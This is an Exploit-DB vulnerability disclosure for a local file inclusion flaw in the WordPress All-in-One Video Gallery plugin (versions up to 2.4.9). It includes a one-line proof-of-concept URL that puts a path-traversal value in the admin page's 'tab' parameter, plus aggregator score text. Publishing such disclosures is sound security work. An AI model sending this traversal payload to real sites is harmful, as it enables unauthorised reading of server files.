Lucene search
Mohamed Magdy AbumusilmEDB-ID:50562HistoryDec 03, 2021 - 12:00 a.m.
WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
2021-12-0300:00:00
Mohamed Magdy Abumusilm
www.exploit-db.com
358
7.4 High
AI Score
Confidence
Low
# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
# Software: All-in-One Video Gallery plugin
# Version: <= 2.4.9
# Tested on: Windows,linux
Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc
Decription : Authenticated user can exploit LFI vulnerability in tab parameter.
Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png
You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/7.4 High
AI Score
Confidence
Low